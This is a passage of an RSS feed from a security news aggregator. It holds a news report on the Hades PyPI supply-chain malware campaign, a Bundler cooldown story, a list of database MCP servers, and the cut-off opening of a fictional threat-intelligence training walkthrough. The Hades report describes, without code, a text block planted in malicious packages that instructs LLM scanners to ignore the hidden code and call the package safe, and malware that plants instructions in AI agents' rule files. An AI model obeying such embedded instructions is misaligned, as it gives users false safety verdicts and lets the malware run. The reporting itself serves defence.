<p>The <a href="https://www.stepsecurity.io/blog/the-hades-campaign-pypi-packages" target="_blank" rel="noreferrer noopener">Hades Campaign</a> was discovered by researchers at StepSecurity, who called it the latest evolution of the Miasma threat actor. The researchers previously described Miasma attacks that had sent self-replicating worms to perform multi-cloud credential sweeps, caused infected repositories to execute code when folders were accessed in integrated development environments (IDEs) or by AI agents, and used techniques that scanned and read Linux process memory.</p>



<p>Hades uses the same credential harvesting methods, self-replicating worm logic, and GitHub-based exfiltration patterns, the researchers noted. In addition to <em>ensmallen</em>, compromised packages include <em>mflux-streamlit</em>, <em>nhmpy</em>, <em>ppkt2synergy</em>, <em>embiggen</em>, <em>gpsea</em>, and <em>pyphetools</em>.</p>



<p>The campaign’s entry point is a simple, obfuscated script embedded inside a Python package’s <em>__init__.py </em>file, a critical building block that gives Python the ability to recognize packages and import modules. Once they gain access, threat actors drop a precompiled Bun runtime binary and executes its JavaScript payload. Bun allows the malware to run complex JavaScript tasks in environments lacking a Node.js installation, bypassing traditional package manager controls and proxy logs.</p>



<p>The malware is able to scrape Linux memory mappings, and also introduces tailored macOS and Windows memory scrapers, which allow threat actors to extract sensitive, encrypted data.</p>



<p>Interestingly, attackers are also able to evade detection by automated LLMs that scan for suspicious code. This is achieved with a simple block of text at the top of the file; this instructs the model to ignore the hidden code below, classify the package as verified and clean, and provide reports stating it is safe.</p>



<p>This element represents what the StepSecurity researchers described as a “significant conceptual shift,” with attackers writing payloads that target AI systems’ cognitive logic. “Scanners that pass raw text to LLMs without strict boundary isolation can be coerced into generating false negative verdicts, allowing the malicious package to bypass organization analysis,” they wrote.</p>



<p>The tactic is indeed clever, Beauceron’s Shipley agreed, pointing out that attackers will increasingly target endpoint LLM-powered agents.</p>



<p>Why? “Because there’s no reliable defense,” he said. “LLMs are incredibly susceptible to social engineering.” This has been relabeled as prompt engineering, but is essentially just phishing for bots, he pointed out.</p>



<p>“While everyone’s worried about LLM-powered vulnerability discovery and automated exploitation, it’s <a href="https://www.csoonline.com/article/4181514/ai-tools-becoming-hot-commodities-on-ransomware-marketplaces.html" target="_blank">LLM-created smart malware</a> like this, and AI-powered phishing of humans and bots, that keeps me awake at night,” Shipley said.</p>



<h2 class="wp-block-heading">Hades’ crafty worm propagation</h2>



<p>The Hades Campaign command and control (C2) infrastructure uses three independent channels on public GitHub infrastructure to allow its communications to blend in with normal traffic. <a href="https://www.csoonline.com/article/4178412/6-critical-security-gaps-every-ciso-must-address.html" target="_blank">Stolen credentials</a> are encrypted locally in a hybrid fashion (serialized, compressed, and pushed to a newly created public GitHub repository under attackers’ control). Exfiltrated repositories carry the description “Hades — The End for the Damned.”</p>



<p>Researchers noted that a core component of this campaign is its ability to propagate and move laterally across networks. It exploits the very methods meant to protect systems, including Secure Shell (SSH) and Secure Copy Protocol (SCP), OpenID Connect (OIDC),and Supply-chain Levels for Software Artifacts (SLSA).</p>



<p>For instance, when running inside a GitHub Actions workflow runner, the malware checks for OIDC variables, then bypasses registry signature policies and generates cryptographically signed SLSA provenance bundles via Sigstore. It can then fetch target libraries and inject the obfuscated script and JavaScript payload. From there, it can publish compromised versions to the Python Package Index (PyPI) repository and node package manager (npm) using the target’s credentials and the generated Sigstore bundle.</p>



<p>“This ensures that the published package appears to have valid, cryptographically verified build provenance from the organization’s official GitHub Actions build environment,” the researchers explained.</p>



<p>Further, if a harvested GitHub token has write permissions, the malware will target repositories to extract secrets using GitHub Actions runners. This occurs “directly from the runner’s address space without ever writing them to disk or making a suspicious network connection,” the researchers noted.</p>



<p>The malware also targets rule files and configuration directories for 14 different AI agents and systems, planting custom prompt instructions or executing hooks that trigger a <em>bun run bootstrap</em> command when the victim loads or consults the workspace with their AI assistant. Finally, it establishes persistence on the workstation and monitors for the presence of the stolen token; if that token is revoked, it executes a wiper process to erase the user’s files.</p>



<p><em>This article originally appeared on <a href="https://www.infoworld.com/article/4182692/meet-hades-the-malware-that-lies-to-ai-security-agents.html" target="_blank">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ruby Fights Supply-Chain Attacks With Filter Offering 'Cooldown' Before Installing New Packages]]></title>
<description><![CDATA[Most supply-chain attacks using Ruby's package hosting site "exploit a narrow window," according to a new blog post form Ruby core maintainer Hiroshi Shibata. 

So its packaging-managing Bundler tool now offers a filter that blocks new version until it's been public "for at least N days. Releases...]]></description>
<link>https://tsecurity.de/de/3581342/it-security-nachrichten/ruby-fights-supply-chain-attacks-with-filter-offering-cooldown-before-installing-new-packages/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581342/it-security-nachrichten/ruby-fights-supply-chain-attacks-with-filter-offering-cooldown-before-installing-new-packages/</guid>
<pubDate>Mon, 08 Jun 2026 13:53:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Most supply-chain attacks using Ruby's package hosting site "exploit a narrow window," according to a new blog post form Ruby core maintainer Hiroshi Shibata. 

So its packaging-managing Bundler tool now offers a filter that blocks new version until it's been public "for at least N days. Releases too new to have been scrutinized are passed over in favor of ones that have aged past the window."

The feature was designed in the open, drawing on how other ecosystems approach the same problem. It is opt-in, and complements rather than replaces existing defenses like mandatory 2FA and trusted publishing... Cooldown is unset by default, so a project without it keeps resolving to the newest versions.... Passing 0 disables cooldown for the run... 

Cooldown is most useful as one part of the wider security investment happening on rubygems.org. The registry now validates gem contents at push time and checks logins against Have I Been Pwned so that compromised passwords cannot be reused, work described in Protecting rubygems.org from the outside in. A dedicated team is running AI-assisted vulnerability scanning against the most critical gems, backed by Alpha Omega and Anthropic, and the direction of all of this is tracked on a public roadmap. Trusted publishing and mandatory 2FA already raise the bar for who can push a release in the first place.
<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Ruby+Fights+Supply-Chain+Attacks+With+Filter+Offering+'Cooldown'+Before+Installing+New+Packages%3A+https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F06%2F08%2F0511207%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F06%2F08%2F0511207%2Fruby-fights-supply-chain-attacks-with-filter-offering-cooldown-before-installing-new-packages%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://developers.slashdot.org/story/26/06/08/0511207/ruby-fights-supply-chain-attacks-with-filter-offering-cooldown-before-installing-new-packages?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[10 MCP servers to connect LLMs with databases]]></title>
<description><![CDATA[Model Context Protocol (MCP) has gained considerable momentum as a standard connector between LLM-powered tools and local systems, internal and external APIs, and data sources. From major clouds to devops tools, MCP servers are enabling powerful, AI-powered development and operations capabilities...]]></description>
<link>https://tsecurity.de/de/3580893/ai-nachrichten/10-mcp-servers-to-connect-llms-with-databases/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580893/ai-nachrichten/10-mcp-servers-to-connect-llms-with-databases/</guid>
<pubDate>Mon, 08 Jun 2026 11:03:51 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> (MCP) has gained considerable momentum as a standard connector between LLM-powered tools and local systems, internal and external APIs, and data sources. From <a href="https://www.infoworld.com/article/4129024/five-mcp-servers-to-rule-the-cloud.html">major clouds</a> to <a href="https://www.infoworld.com/article/4096223/10-mcp-servers-for-devops.html">devops tools</a>, MCP servers are enabling powerful, AI-powered development and operations capabilities through natural language commands.</p>



<p>Nowhere is this more true than in the world of databases. Most major database platforms now support agentic access through MCP servers. Using an MCP server for databases, you and your AI agent proxies can perform lookups, create and update data, and perform administrative tasks without you having to write SQL by hand.</p>



<p>The MCP server could also guide your LLMs to write new code or build automations that align with your database schema, like its tables, structure, and fields, as well as embeddings, indexes, and metadata. It could also aid debugging by enabling faster queries to surface data issues or misconfigurations, along with plenty of other possible use cases.</p>



<p>Below, we’ll cover official MCP servers from some of the top platform options across major database styles. Though maturity varies, the MCP servers discussed below represent some of the best vendor-backed offerings available today across relational <a href="https://www.infoworld.com/article/4140734/the-revenge-of-sql-how-a-50-year-old-language-reinvents-itself.html" data-type="link" data-id="https://www.infoworld.com/article/4140734/the-revenge-of-sql-how-a-50-year-old-language-reinvents-itself.html">SQL</a>, <a href="https://www.infoworld.com/article/2260280/what-is-nosql-databases-for-a-cloud-scale-future.html" data-type="link" data-id="https://www.infoworld.com/article/2260280/what-is-nosql-databases-for-a-cloud-scale-future.html">NoSQL</a>, <a href="https://www.infoworld.com/article/2265778/what-is-a-graph-database-a-better-way-to-store-connected-data.html" data-type="link" data-id="https://www.infoworld.com/article/2265778/what-is-a-graph-database-a-better-way-to-store-connected-data.html">graph</a>, <a href="https://www.infoworld.com/article/2335281/vector-databases-in-llms-and-search.html" data-type="link" data-id="https://www.infoworld.com/article/2335281/vector-databases-in-llms-and-search.html">vector</a>, and <a href="https://www.infoworld.com/article/2268778/what-is-a-data-warehouse-the-source-of-business-intelligence.html" data-type="link" data-id="https://www.infoworld.com/article/2268778/what-is-a-data-warehouse-the-source-of-business-intelligence.html">data warehouse</a> systems.</p>



<p>These servers can be used by any MCP-compatible tool, IDE, or agent, whether it’s Claude Code, Codex, Cursor, Gemini CLI, Google Antigravity, VS Code, Windsurf, or something else. Adding them is typically simple, often involving a lightweight JSON addition to your MCP configuration file.</p>



<h2 class="wp-block-heading"><a></a><a></a>Amazon Aurora MCP Servers</h2>



<p><a href="https://www.mysql.com/">MySQL</a> and <a href="https://www.postgresql.org/">PostgreSQL</a> are the world’s most widely-used <a href="https://www.infoworld.com/article/2262355/what-is-open-source-software-open-source-and-foss-explained.html">open source</a> databases. However, in both cases, there is no canonical MCP server—what we see are different MCP servers emerging across vendors. One of these vendors is Amazon Web Services (AWS), which offers official MCP servers for Amazon Aurora, its managed relational database service compatible with both MySQL and PostgreSQL.</p>



<p>According to the <a href="https://github.com/awslabs/mcp/tree/main/src/mysql-mcp-server">documentation on GitHub</a>, the <a href="https://awslabs.github.io/mcp/servers/mysql-mcp-server">Amazon Aurora MySQL MCP Server</a> can be used to convert natural language commands into MySQL-compatible SQL queries, which can then be executed against Aurora MySQL databases. Similarly, the <a href="https://github.com/awslabs/mcp/tree/main/src/postgres-mcp-server">Aurora Postgres MCP Server</a> provides MCP tools for working on PostgreSQL databases. The <a href="https://github.com/awslabs/mcp/tree/main/src/aurora-dsql-mcp-server">Aurora DSQL MCP Server</a> does the same for distributed Postgres databases.</p>



<p>AWS provides a <a href="https://github.com/awslabs/mcp">growing portfolio of official MCP servers</a> across its product line, including MCP servers for other Amazon database platforms like <a href="https://awslabs.github.io/mcp/servers/dynamodb-mcp-server">DynamoDB</a>, <a href="https://awslabs.github.io/mcp/servers/elasticache-mcp-server">ElastiCache</a>, and <a href="https://awslabs.github.io/mcp/servers/redshift-mcp-server">Redshift</a>. If you’re a heavy AWS shop and you want to enable LLM interactions with your data, these are sensible choices.</p>



<h1 class="wp-block-heading"><a></a>BigQuery MCP Server</h1>



<p>BigQuery is Google’s cloud-based data analytics platform, and a popular data source for AI applications. BigQuery users with API access configured can also utilize the <a href="https://docs.cloud.google.com/bigquery/docs/use-bigquery-mcp">BigQuery MCP Server</a> to interact with the platform using MCP-compatible AI clients.</p>



<p>Using the remote <a href="https://docs.cloud.google.com/bigquery/docs/use-bigquery-mcp">BigQuery MCP Server</a>, engineers can generate and execute queries on data sources, or return metadata on datasets, tables, and schema. This can be done with a simple natural language prompt like “List the datasets in project <code>PROJECT_ID</code>.” Results are filterable by region, data set ID, column name, and more.</p>



<p>As part of Google’s fully-managed, remote-hosted MCP portfolio, the BigQuery MCP Server provides some peace of mind regarding security, maintenance, and ease of use for distributed teams. The MCP tools are subject to some limitations, however, in terms of query result size, processing time, and other factors. If you’re using BigQuery and you want more agentic control, you’ll want to check this one out.</p>



<h2 class="wp-block-heading"><a></a>Elastic Agent Builder</h2>



<p>Another important database category includes platforms designed for keyword and semantic search. In this space, <a href="https://www.elastic.co/elasticsearch">Elasticsearch</a> is commonly deployed. Instead of providing a single MCP server, Elasticsearch provides the <a href="https://www.elastic.co/docs/explore-analyze/ai-features/elastic-agent-builder">Elastic Agent Builder</a>, which is a more comprehensive framework aimed at agentic workflows.</p>



<p>Using Elastic Agent Builder, you can chat with an agent to retrieve data context from Elasticsearch data and extend it into various environments. The Agent Builder itself includes an <a href="https://www.elastic.co/docs/explore-analyze/ai-features/agent-builder/mcp-server">MCP server</a> endpoint for programmability and exposing the agent to other clients.</p>



<p>Unlike others on this list, this is not a direct MCP interface to raw Elasticsearch APIs. Instead, it’s an interface that exposes skills from the agent platform. This should also not be confused with the <a href="https://github.com/elastic/mcp-server-elasticsearch/releases">Elasticsearch MCP Server</a>, released in mid-2025, which has since been deprecated.</p>



<p>A possible downside of using this utility is that it includes an additional layer between your IDE or agent and the data you’re searching. The agent setup requires a higher subscription and takes additional steps to configure compared to other MCP servers.</p>



<p>That said, if you want an extensible common layer to interact with both Elasticsearch and external MCP servers, while centralizing responsibilities like permissions, this is an interesting proposition.</p>



<h2 class="wp-block-heading"><a></a>MCP servers for Neo4j</h2>



<p>Graph databases are another key NoSQL database type these days, specializing in using nodes and edges to accelerate queries of highly interconnected data. Of these, <a href="https://neo4j.com/product/neo4j-graph-database/">Neo4j</a> is a popular graph database option.</p>



<p>The <a href="https://neo4j.com/developer/genai-ecosystem/model-context-protocol-mcp/">Official MCP Server for Neo4j</a> works with all kinds of Neo4j deployment (desktop, sandbox, self-managed, and the managed Neo4j Aura cloud service), and allows LLM-based clients to retrieve graph schema, execute read and write statements, execute graph algorithms, and more.</p>



<p>In addition, several other MCP servers for Neo4j are <a href="https://github.com/neo4j-contrib/mcp-neo4j">available from Neo4j Labs</a>. These have specialized uses, such as generating Cypher queries from natural language, maintaining an in-memory graph database, modeling and visualizing graph, and interacting with the Neo4j Aura API.</p>



<p>The first MCP server for Neo4j was developed in December 2024. If you’re an avid Neo4j user and want to experiment with interacting with your graph databases in a chat-infused way, these stand as an interesting platform of servers.</p>



<h2 class="wp-block-heading">MCP Toolbox for Databases</h2>



<p>Google’s <a href="https://github.com/googleapis/mcp-toolbox">MCP Toolbox for Databases</a> is a notable MCP server because it’s a popular catch-all for various database types. Unlike the other entries on this list, this server connects LLMs not to a single managed database, but unifies LLM access to multiple systems. The open source utility ships with <a href="https://mcp-toolbox.dev/documentation/configuration/prebuilt-configs/">pre-built configurations</a> for nearly 30 databases including PostgreSQL, MySQL, SQL Server, Oracle Database, MongoDB, Redis, Neo4j, and Snowflake, as well as the databases in Google Cloud.</p>



<p>Once you define data sources in a tools.yaml file, you can use MCP Toolbox to perform structured queries or semantic searches against databases directly from within an IDE or agentic client using plain English. MCP tools translate commands into actions like <code>list_tables</code> and <code>execute_sql</code>.</p>



<p>MCP Toolbox for Databases is mature, originally built as a generative AI utility and later re-worked for MCP-style workflows. It offers numerous download, configuration, and interaction methods.</p>



<p>If you’re using a variety of databases on Google Cloud and elsewhere and you want an “all-in-one” MCP server, MCP Toolbox for Databases is a great place to start.</p>



<h2 class="wp-block-heading"><a></a>MongoDB MCP Server</h2>



<p><a href="https://www.mongodb.com/">MongoDB</a> is the popular NoSQL document-oriented database. The creators of MongoDB have released an <a href="https://github.com/mongodb-js/mongodb-mcp-server">official MCP server</a> that works with the open-source database as well as the company’s cloud-hosted MongoDB Atlas database platform.</p>



<p>The MongoDB MCP Server provides a <a href="https://github.com/mongodb-js/mongodb-mcp-server#tool-list">number of tools</a> to interact with MongoDB. You can query the database, return information on collections, create or remove collections or indexes, gather statistics on database usage, and more. Other tools enable MongoDB Atlas operations, like creating users or clusters, returning cluster data, and other functions.</p>



<p>The server’s tools are read-only by default but can be switched to allow write capabilities. It can be used locally, but also supports Streamable HTTP transport for remote servers, although that comes with greater security concerns.</p>



<p>For those using MongoDB and wanting to hook their AI-enabled IDE or CLI up with more automated powers, the official MongoDB MCP Server is worth checking out.</p>



<h2 class="wp-block-heading">Pinecone MCP server</h2>



<p>Among <a href="https://www.infoworld.com/article/4060211/do-vector-native-databases-beat-add-ons-for-ai-applications.html">vector-native databases</a>, <a href="https://www.pinecone.io/">Pinecone</a> stands as a strong, widely used option with a well-designed <a href="https://docs.pinecone.io/reference/api/introduction">API</a> and comprehensive SDKs. The <a href="https://docs.pinecone.io/guides/operations/mcp-server">Pinecone MCP server</a> extends this experience, allowing users to query its documentation and execute functionality via AI agents and AI-enabled IDEs.</p>



<p>To date, the Pinecone MCP server consists of nine MCP tools. These cover read-only actions, like knowledge gathering via the Pinecone official documentation and querying vector records, index metadata, configurations, and statistics. It also allows for write operations like updating records and creating new indexes.</p>



<p>Released in mid-2025, the Pinecone MCP server is one of the more complete early implementations, with easy configuration and installation.</p>



<p>For those using Pinecone who want to test new LLM-assisted workflows for creating indexes with embeddings, performing reranking, or testing results using natural language commands, the Pinecone MCP server is worth trying out.</p>



<h2 class="wp-block-heading"><a></a>Redis MCP</h2>



<p>An ultra-fast in-memory database, Redis is commonly used for caching, real-time analytics, and other latency-sensitive use cases. And as you might have guessed, the company behind the Redis database provides an <a href="https://redis.io/docs/latest/integrate/redis-mcp/">official MCP server</a>. The server allows read, query, and write capabilities.</p>



<p>Developers can use Redis MCP from an LLM client to perform high-level actions to analyze, reference, or embed Redis data and interact with the Redis server within their prompts. The documentation suggests some example prompts for common use cases, such as “Cache this item,” “How many keys does my database have?,” and “What is user:1’s email?”</p>



<p>Unlike other MCP servers, which only allow a slice of platform capabilities, Redis MCP offers full Redis support. This enables working with Redis constructs such as hashes, lists, sets, sorted sets, streams, and more, according to the <a href="https://github.com/redis/mcp-redis">GitHub repository</a>.</p>



<p>One possible drawback is that Redis MCP has yet to support Streamable HTTP transport. Until this is developed, the server is constrained to local deployment. But for those seeking a local MCP server to work with Redis data, this is the best choice.</p>



<h2 class="wp-block-heading"><a></a>Snowflake MCP Server</h2>



<p>Snowflake is a cloud-hosted, AI-enabled data platform widely used in enterprise contexts for data warehousing, data analytics, and data engineering purposes. Compared to other data storage systems, Snowflake is unique in that it’s more fully managed and combines structured and non-structured data types.</p>



<p>The <a href="https://www.snowflake.com/en/developers/guides/getting-started-with-snowflake-mcp-server/">Snowflake MCP Server</a>, available on <a href="https://github.com/Snowflake-Labs/mcp">GitHub</a>, can be used to perform many of the standard Snowflake platform operations. This includes a “fuzzy” search of all records via Snowflake’s Cortex Search and structured data semantic lookups using Cortex Analyst.</p>



<p>Other abilities include object management operations like creating, updating, and deleting records. The server also can invoke other agentic-designed capabilities, like the ability to generate and execute SQL statements against back-end databases.</p>



<p>Snowflake MCP Server is well-thought-out and well-documented, with walkthroughs for various agent and deployment patterns. Those already building with Snowflake should find it complements the mechanics they already employ.</p>



<h2 class="wp-block-heading"><a></a>Supabase MCP Server</h2>



<p>A longtime open-source favorite, <a href="https://www.postgresql.org/">PostgreSQL</a> is one of the most popular and trusted object-relational SQL-based database systems. With an active <a href="https://leaddev.com/technical-direction/postgresql-database-quietly-ate-world">open source community</a>, Postgres has been maturing for decades. Given its open source nature, there isn’t a single “official” MCP server for the platform. Anthropic built an original reference implementation, but it’s <a href="https://github.com/modelcontextprotocol/servers-archived/tree/main/src/postgres">now archived</a>.</p>



<p>Instead, database platforms built on PostgreSQL provide <a href="https://dbhub.ai/blog/state-of-postgres-mcp-servers-2025">different flavors</a> of MCP servers, with a range of vendor neutrality and specificity. One notable option is the <a href="https://github.com/supabase-community/supabase-mcp#database">Supabase MCP Server</a>, provided by <a href="https://supabase.com/mcp">Supabase</a>, a cloud-based “back end as a service” and Postgres development platform.</p>



<p>Supabase MCP Server connects AI agents with Supabase projects, allowing engineers to issue natural language commands to manage tables, query data, get logs, fetch configuration information, and more. The Supabase MCP Server is pre-1.0 release and some features are still experimental.</p>



<p>If you’re an engineer using Supabase and looking for an MCP server to connect your AI assistant with your Postgres databases, this is a good tool to test out.</p>



<h2 class="wp-block-heading"><a></a><a></a>Other MCP servers for databases to consider</h2>



<p>So far, we’ve reviewed official, vendor-backed MCP servers from some of the most-adopted managed databases. However, numerous MCP servers exist across other database platforms and types.</p>



<p>One MCP server that aggregates LLM access across various database types is <a href="https://github.com/bytebase/dbhub">DBHub</a>, which works with MySQL, PostgreSQL, SQL Server, MariaDB, and SQLite. Developed by <a href="https://www.bytebase.com/">Bytebase</a>, DBHub is described as a zero-dependency, token-efficient MCP server.</p>



<p>For SQL, the options are nearly endless. Official servers exist for <a href="https://devblogs.microsoft.com/azure-sql/introducing-sql-mcp-server/">Microsoft Azure SQL</a> and <a href="https://github.com/motherduckdb/mcp-server-motherduck">DuckDB</a>. PulseMCP catalogs more than <a href="https://www.pulsemcp.com/servers?q=mysql">100 MCP servers</a> for <a href="https://dev.to/benborla/mcp-server-for-mysql-3jf1#main-content">MySQL</a>, although most are unofficial, solo-creator open source projects. Of these, one of the most starred is <a href="https://github.com/benborla/mcp-server-mysql">MCP Server for MySQL</a>, developed by full-stack developer <a href="https://benborla.dev/">Ben Borla</a> and optimized for Claude Code.</p>



<p>For Postgres, notable alternatives to Supabase include <a href="https://github.com/pgEdge/pgedge-postgres-mcp/">pgEdge Postgres MCP</a>, <a href="https://neon.com/docs/ai/neon-mcp-server">Neon MCP server</a>, and <a href="https://github.com/crystaldba/postgres-mcp">Postgres MCP Pro</a>. For vector databases, others beyond Pinecone have been quick to adopt MCP as well, including <a href="https://docs.weaviate.io/weaviate/mcp/docs-mcp-server">Weaviate</a> and <a href="https://milvus.io/docs/milvus_and_mcp.md">Milvus</a>.</p>



<h2 class="wp-block-heading"><a></a>Using MCP for databases: what to watch out for</h2>



<p>Before diving into MCP servers for enterprise databases, it’s important to understand the security risks. For instance, prompt injection remains an <a href="https://dbhub.ai/blog/state-of-postgres-mcp-servers-2025">unsolved problem</a>, so it’s recommended to limit permissions for SQL statements.</p>



<p>To mitigate this, <a href="https://github.com/supabase-community/supabase-mcp#security-risks">Supabase recommends</a> enabling AI client settings that require manual approval for each tool call before execution. Experts also recommend assigning only the minimum permissions required and avoiding exposure of sensitive data like API credentials. Due diligence around authentication and authorization is especially important when hosting remote servers.</p>



<p>Lastly, to avoid shadow IT, it’s becoming common practice to catalog the internal MCP servers you use, even for experimental projects. For this, experts recommend an <a href="https://www.infoworld.com/article/4145014/how-to-build-an-enterprise-grade-mcp-registry.html">MCP registry</a> that documents approved servers. An MCP registry improves both MCP server discovery and security awareness.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CTI as a Code in Practice: Reactive Investigation — LifeTech Pharma]]></title>
<description><![CDATA[A complete walkthrough of the methodology applied to a real training scenario: pharmaceutical IP theft, dual entry points, and a DCSync that changes everything.All organizations, names, and data are fictional. This is training assignment A01 from the CTI as a Code repository.Based on the methodol...]]></description>
<link>https://tsecurity.de/de/3580443/hacking/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580443/hacking/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma/</guid>
<pubDate>Mon, 08 Jun 2026 06:38:21 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4><strong>A complete walkthrough of the methodology applied to a real training scenario: pharmaceutical IP theft, dual entry points, and a DCSync that changes everything.</strong></h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*l8B3xIJssFbBTn0IvOu6Ng.png"></figure><p><em>All organizations, names, and data are fictional. This is training assignment A01 from the CTI as a Code repository.</em></p><h3>Based on the methodology: “CTI as a Code”</h3><p><a href="https://medium.com/@1200km/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46">CTI as a Code: Complete Step-by-Step Methodology</a></p><h3>Contents</h3><ol><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#276c"><strong>The Scenario</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#8c81"><strong>Step 00: Clone, Initialize, and Fill the Template</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#cd59"><strong>Step 0: Intake — What the First Call Captures</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#999a"><strong>Step 1–2: Project Setup and Scope</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#7b9a"><strong>Step R1: Evidence Inventory — What Exists and What Is Missing</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#a778"><strong>Step R1.5: Hands-On Evidence Analysis — VS Code Investigation</strong></a><strong><br></strong><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#966d">1. CrowdStrike Alert — JSON in VS Code</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#2702">2. Decode the PowerShell Payload</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#2db4">3. M365 Message Trace — Rainbow CSV</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#13b3">4. Azure AD Sign-In Analysis</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#6238">5. VPN Log Analysis</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#b73e">6. NGFW Log Analysis — Rainbow CSV</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#a734">7. SQL Audit Log Analysis</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#ecca">8. Windows Security Event Log Analysis</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#13de">9. Cross-File Pivot — VS Code Global Search</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#9a59">10. IOC Enrichment — REST Client</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#0bd0">11. Sandbox Analysis — Submit the Binary</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#da15">12. Static Binary Analysis — Hex Editor + Terminal</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#97f1">13. Infrastructure Pivot — REST Client + Global Search</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#c0c4">14. Splunk Correlation (SIEM Validation)</a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#5829"><strong>Step R2: Timeline — Two Paths, One Actor</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#06d0"><strong>Step R3: Claims Ledger — Every Assertion Traced to Evidence</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#bc78"><strong>Step R4: ATT&amp;CK Mapping — Where Detection Failed</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#7d71"><strong>Step R5: Attribution Assessment — Same Actor or Two?</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#b2e8"><strong>Step R6: Detection Rules — Four That Would Have Changed the Outcome</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#d8bd"><strong>Step R7: Deliverables — What Each Stakeholder Gets</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#cf97"><strong>The Git History: What a Completed Investigation Looks Like</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#5f5a"><strong>Key Lessons</strong></a></li></ol><h3>The Scenario</h3><p><strong>LifeTech Pharma Ltd.</strong> is a mid-sized Israeli pharmaceutical company in Rehovot. It develops and manufactures generic drugs and biological APIs, exports to the US, EU, and MENA, and recently signed a $52 million licensing deal with a US biopharma partner. The signed formula files are stored on SERVER-RD-02\LicenseDeals\USPartner2024\ — 47 files, approximately 380 MB 